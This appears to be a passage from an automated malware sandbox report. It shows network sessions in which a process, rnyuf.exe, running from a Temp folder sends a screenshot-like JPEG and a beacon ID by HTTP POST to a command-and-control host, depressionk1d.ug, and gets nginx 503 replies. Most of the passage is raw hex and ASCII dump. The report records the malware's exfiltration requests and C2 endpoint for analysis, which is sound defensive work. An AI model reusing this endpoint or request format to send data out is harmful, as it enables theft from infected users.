74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                                                                                                                                                                                Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                                                                                                                                                                                Nov 11, 2021 12:27:29.285454035 CET27176OUTData Raw: b7 68 72 6a d7 d2 b4 7a 35 fe a5 1d 8e 9e 91 46 2f 2d 62 83 6a c5 89 96 36 9d 1e 2c 86 da 31 80 d8 ce 08 c1 07 8f f1 1d dd 9f f6 36 93 67 63 6d a7 42 48 b8 92 e5 60 f2 e5 95 18 4f 28 45 69 54 64 80 9b 71 ce 18 60 f3 c6 39 df 29 7f ba 29 42 01 d0
                                                                                                                                                                                Data Ascii: hrjz5F/-bj6,16gcmBH`O(EiTdq`9))BP+Zs<Z#cw)e%I-ii,aX')-(YDlC8$ngwEs{9Qu{m-nQREn`QE%Q@(9`G4sH( 0IE-
                                                                                                                                                                                Nov 11, 2021 12:27:29.285567045 CET27192OUTData Raw: 91 68 ef 49 45 30 17 34 a0 d3 69 68 4c 43 c3 53 d5 b9 a8 45 38 55 5c 96 89 b2 0d 05 41 a8 81 a5 04 d5 5c 56 1c 61 53 4c 36 fe 95 20 6a 70 6a 2c 98 af 24 56 30 b0 a6 94 23 b5 5d e0 d2 ec 53 4b 91 0f da 3e a6 79 14 a2 ae 98 54 d3 0d b7 71 4b d9 b2
                                                                                                                                                                                Data Ascii: hIE04ihLCSE8U\A\VaSL6 jpj,$V0#]SK>yTqK+b0M(.V)qF)bRKvR([P)qKiWb1L.7b1EqQ,#"TX.E.(.Q+S iZB#X9>Gmjqh;1I8ke'q(
                                                                                                                                                                                Nov 11, 2021 12:27:29.285742998 CET27196OUTData Raw: 9f f0 45 be f0 e6 ad a6 d8 bd e5 dd b2 c7 0c 6e 91 c8 44 f1 b3 46 ec 09 0a ea 18 b2 b6 01 e0 80 47 7a ca 15 d1 6a 3a ce 9d a9 78 73 5e 96 2b 3f b0 ea 17 ba 85 ad c4 c8 f7 7e 67 9a d8 97 79 8d 76 82 a8 09 ce 3e 62 37 75 e9 5c ed 6d 46 a4 e7 75 35
                                                                                                                                                                                Data Ascii: EnDFGzj:xs^+?~gyv>b7u\mFu5k2pl@)(AGz)hRR(*QGz`-- )i)Z(N!E-7(!F)D>SE(5DSsFix4iDipDRR8SuR%PxZd4H<
                                                                                                                                                                                Nov 11, 2021 12:27:29.310672998 CET27201OUTData Raw: 35 96 54 92 53 7e 67 a5 99 dd d4 82 7d 8f 4f 8b 8f 87 76 7f 85 72 d2 e4 93 5d 52 a9 3f 0f ac 47 ae 2b 99 96 22 7d 73 46 0d ab cf d5 9c d9 ac 1b e5 b7 64 54 a2 9e 51 85 37 04 76 af 45 34 cf 05 c5 ad c4 a2 8a 29 88 5a 29 29 40 a0 07 a8 1d a9 e3 ef
                                                                                                                                                                                Data Ascii: 5TS~g}Ovr]R?G+"}sFdTQ7vE4)Z))@QIUp}6mOzRs<T3(1RhfJQc#ho SSGZp5r%Y9nSI{8=/frhwDj=jQ+kQygSaTe{
                                                                                                                                                                                Nov 11, 2021 12:27:29.310782909 CET27217OUTData Raw: 44 7b 3e a9 c6 85 a4 ff 00 d7 11 fc ab 17 bd 6d ea dc 68 da 50 ff 00 a6 23 f9 0a c3 ae 5c 2f f0 fe f2 b1 ff 00 c6 fb 85 c5 2e 0d 26 69 73 5d 27 18 53 c5 32 94 1a 91 a2 4a 5a 68 34 bd e9 16 85 14 e1 4d cd 38 52 29 0e ed 4a 29 07 6a 78 a8 2d 0a 3a
                                                                                                                                                                                Data Ascii: D{>mhP#\/.&is]'S2JZh4M8R)J)jx-:fZx&xRD=i$iL4TsPPu68k~(m+^yW.>]_-kC3Z8yVL:SIy}dT{w.f>M()T[;xt+f{$
                                                                                                                                                                                Nov 11, 2021 12:27:29.310872078 CET27223OUTData Raw: 9a 09 cd 02 b0 13 cd 2d 37 bd 28 a0 63 a9 c2 9b 4a 29 88 70 a5 a6 8a 5a a2 47 0a 70 a6 8a 51 d6 9a 24 75 14 51 54 21 45 2f 5a 4a 72 8a 68 43 80 a7 d2 01 4b 5a 23 36 38 52 d2 52 8a 64 8b 45 2e 29 40 aa 10 0a 75 20 14 84 d3 d8 40 5b d2 99 47 5a 31
                                                                                                                                                                                Data Ascii: -7(cJ)pZGpQ$uQT!E/ZJrhCKZ#68RRdE.)@u @[GZ1R8uWD)4x<b<-ZD64iS-ZD6QN4FM(7aTbQ@Z~+TKNNUb.0xS.CqN4\T(J#<(r#OOGz<(!NM71lc
                                                                                                                                                                                Nov 11, 2021 12:27:29.310939074 CET27228OUTData Raw: a2 e0 2d 28 a6 d2 8a 60 29 a5 a4 a5 a0 41 4a 28 ed 45 02 16 9d 4d a0 1a a1 0e a2 93 22 81 4c 07 51 49 45 02 16 8a 4a 28 01 68 34 50 68 01 7b d0 29 29 d4 c4 2d 14 0a 29 92 38 53 a9 a2 96 a8 4c 75 2d 34 52 d3 10 b4 b4 de f4 e1 4c 42 d3 81 a6 52 83
                                                                                                                                                                                Data Ascii: -(`)AJ(EM"LQIEJ(h4Ph{))-)8SLu-4RLBRdM-PQSsFhfsFh.iSX40isNI3NbMnQ.+fyJ0r579IFq&`&]`DOjMpD'4R4QM:J(KLUp4j1KTh~i


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                47192.168.2.549865178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:27:30.463103056 CET27246OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----0404c211066d7a232dbda2f5b8589675
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 85133
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:27:30.463135004 CET27246OUTData Raw: 2d 2d 2d 2d 2d 2d 30 34 30 34 63 32 31 31 30 36 36 64 37 61 32 33 32 64 62 64 61 32 66 35 62 38 35 38 39 36 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------0404c211066d7a232dbda2f5b8589675Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:27:30.463226080 CET27256OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:27:30.463255882 CET27259OUTData Raw: 18 22 87 65 ab 04 9b d8 c9 af 58 f8 4d e3 dd 0b c2 1a 3e a1 6f ab 4d 32 49 3d c0 74 58 a2 2f c0 5c 73 5e 71 67 a0 6b 5a 8b ba 59 68 fa 85 cb 22 23 ba c1 6a ee 55 5c 65 09 c0 e0 11 c8 3d c5 55 16 77 58 88 fd 96 7c 4d 21 8a 23 e5 9f 9d c6 32 a3 8e
                                                                                                                                                                                Data Ascii: "eXM>oM2I=tX/\s^qgkZYh"#jU\e=UwX|M!#2Hz(r]vx3~/?|=|uwqIer2`B=0iSL%\.Ccs+/cY>{k%OG$vx#A!R<W)k%%}
                                                                                                                                                                                Nov 11, 2021 12:27:30.488464117 CET27261INHTTP/1.1 503 Service Temporarily Unavailable
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:30 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 1230
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                ETag: "5a4b7cd2-4ce"
                                                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                                                                                                                                                                                Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                                                                                                                                                                                Nov 11, 2021 12:27:30.488652945 CET27266OUTData Raw: b7 68 72 6a d7 d2 b4 7a 35 fe a5 1d 8e 9e 91 46 2f 2d 62 83 6a c5 89 96 36 9d 1e 2c 86 da 31 80 d8 ce 08 c1 07 8f f1 1d dd 9f f6 36 93 67 63 6d a7 42 48 b8 92 e5 60 f2 e5 95 18 4f 28 45 69 54 64 80 9b 71 ce 18 60 f3 c6 39 df 29 7f ba 29 42 01 d0
                                                                                                                                                                                Data Ascii: hrjz5F/-bj6,16gcmBH`O(EiTdq`9))BP+Zs<Z#cw)e%I-ii,aX')-(YDlC8$ngwEs{9Qu{m-nQREn`QE%Q@(9`G4sH( 0IE-
                                                                                                                                                                                Nov 11, 2021 12:27:30.488694906 CET27271OUTData Raw: 5f 95 a7 f7 3b 9f 60 db 78 a7 42 b9 b7 49 97 56 b3 40 c3 3b 65 99 51 87 d4 13 9a c2 97 4e f0 7c 9a 7d fd aa 6b 16 50 c9 7d 72 6e a5 ba 8e e2 11 36 ff 00 37 cd 03 71 1c 80 c0 60 10 78 af 99 3f b4 2f 7f e7 f2 e3 fe fe b7 f8 d1 fd a1 7b ff 00 3f 97
                                                                                                                                                                                Data Ascii: _;`xBIV@;eQN|}kP}rn67q`x?/{?pZuo}AxONPMn[+5ldgebc1[(SY>NVc9/h^?Gw_,F=T}m8(Pp;+v*^u3ow(f_B
                                                                                                                                                                                Nov 11, 2021 12:27:30.488713026 CET27277OUTData Raw: 3b ce cf 6a 39 22 c3 9e 45 2d 8c 3b 1a 6e d3 e9 57 fc c5 3d 45 2f ee cf f0 d1 ec fc c3 da 3e c6 7f 39 a5 19 c5 68 79 51 1a 0d b4 47 bd 2f 64 c3 da a3 3e 96 ae 7d 8c 76 6a 4f b1 b7 63 47 b2 90 fd a4 4a 94 55 83 69 20 ed 4d 36 f2 0e c6 97 23 1a 9c
                                                                                                                                                                                Data Ascii: ;j9"E-;nW=E/>9hyQG/d>}vjOcGJUi M6#{T6iHJ1N(PS6(\1ERS!(PK@H)iF9-1F)iiJ4THZb)qKKLTM1NVa\n(?b1K~p^iXv(
                                                                                                                                                                                Nov 11, 2021 12:27:30.488727093 CET27281OUTData Raw: 46 46 2b 23 64 02 31 c5 79 56 69 45 57 d5 a9 76 17 d6 2a 77 16 8a 28 ef 5b a3 01 69 29 69 28 62 12 90 d2 d1 40 c2 96 90 52 d0 80 29 69 29 68 10 a0 d2 d2 52 d3 13 0a 5a 4a 5a a1 0a 29 d4 d1 4b 40 98 b4 b4 94 a2 98 82 96 92 8a 60 3a 8a 4a 29 88 5a
                                                                                                                                                                                Data Ascii: FF+#d1yViEWv*w([i)i(b@R)i)hRZJZ)K@`:J)Z(ESi)A>)jHiN%ZbxcQUd!Ki8)VqE9j4lh-*OWUArU$MVpsOZ):e*SzpsO}PO
                                                                                                                                                                                Nov 11, 2021 12:27:30.490159035 CET27286OUTData Raw: 9e d5 46 63 04 92 5d bb 69 fa 9c e9 7d 10 4b bf 3e fd 5a 66 2a c1 95 95 c4 40 0c 63 1c ab 70 48 e2 ab df 25 dd ef f6 ac 8f 6a 15 b5 28 16 df 62 37 10 2a bc 6c b8 ce 73 81 18 5f c7 35 ce a5 8f d6 d7 fe 9e c7 47 2e 5d 75 7b 6f af ea ff 00 ae a7 43
                                                                                                                                                                                Data Ascii: Fc]i}K>Zf*@cpH%j(b7*ls_5G.]u{oCvicVvenb+]G8H*<H2I,$+xnGH=i;S'qzWqB}$(QFk)&\YAwSP+K4&GNVu~|x<RzxE=@RYTc$
                                                                                                                                                                                Nov 11, 2021 12:27:30.514832020 CET27292OUTData Raw: 6f f1 d7 51 b5 b5 86 dd 34 4b 42 b1 22 a2 96 95 b2 40 18 e6 a4 ff 00 85 f9 aa 7f d0 12 cb fe fe bd 70 53 8d 7a 7f 0f 5f 4f c8 ed a8 e8 54 b7 37 4f 5f cc f4 c5 f0 64 97 93 a4 9a ee b3 75 a9 a4 67 2b 01 5f 2a 3c fb a8 27 3f a5 6e 6a ea b1 f8 7e fd
                                                                                                                                                                                Data Ascii: oQ4KB"@pSz_OT7O_dug+_*<'?nj~BH@a_@K/=NkgMFdlF?:*FO__m:0R$LQ(L@GzQLRQEffiE;R%JM%&4-/zJQ@04RQ@@Qi(=i6
                                                                                                                                                                                Nov 11, 2021 12:27:30.514866114 CET27307OUTData Raw: 5c b8 79 ba 70 e5 71 77 0c 56 1a 55 6a 39 c6 4a c5 c0 c3 14 a1 c5 66 37 8c 7c 2b fc 36 f7 b5 0b 78 cb c3 5d a1 bd ae 85 55 3e 8c e5 78 4a 8b b1 b8 18 1e f4 64 57 3c 7c 67 e1 fe d1 5e 53 4f 8c f4 21 d2 3b bf d2 9f 3a ec 2f ab d4 3a 4c d2 e6 b9 9f
                                                                                                                                                                                Data Ascii: \ypqwVUj9Jf7|+6x]U>xJdW<|g^SO!;:/:LMA,GQ,CT*v:qN-?K)`4k=G)`iC]1PTv q(vMZ;QOX[R\BZL(b
                                                                                                                                                                                Nov 11, 2021 12:27:30.561141014 CET27335INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                                                                                                                                                                                Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                48192.168.2.549867178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:27:34.541013956 CET27339OUTPOST /k8FppT/index.php HTTP/1.1
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 31
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Data Raw: 64 31 3d 31 30 30 30 30 39 38 30 30 31 26 75 6e 69 74 3d 31 35 32 31 33 38 35 33 33 32 31 39
                                                                                                                                                                                Data Ascii: d1=1000098001&unit=152138533219
                                                                                                                                                                                Nov 11, 2021 12:27:34.566498041 CET27341INHTTP/1.1 503 Service Temporarily Unavailable
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:34 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 1230
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                ETag: "5a4b7cd2-4ce"
                                                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
